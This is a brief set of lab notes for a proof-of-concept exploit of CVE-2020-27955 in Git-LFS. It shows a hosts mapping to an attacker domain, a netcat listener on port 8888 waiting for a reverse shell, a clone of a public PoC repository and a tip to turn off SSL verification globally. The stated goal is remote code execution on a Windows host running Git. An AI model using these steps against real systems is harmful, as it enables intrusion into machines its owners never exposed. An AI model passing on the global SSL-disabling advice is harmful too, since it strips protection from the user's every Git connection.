
Proof-of-concept exploit for CVE-2020-27955 in Git-LFS, demonstrating remote code execution via a crafted git clone operation to obtain a reverse shell.
Download link: https://github.com/git-for-windows/git/releases/tag/v2.29.2.windows.1
10.1.1.5 abcall.xyz
┌──(root㉿hostname)-[~]
└─# nc
Cmd line: -l -p 8888
git clone https://github.com/z50913/CVE-2020-27955.git
#Other If an SSL certificate error occurs, first run the following command to disable SSL verification, then clone again
git config --global http.sslverify false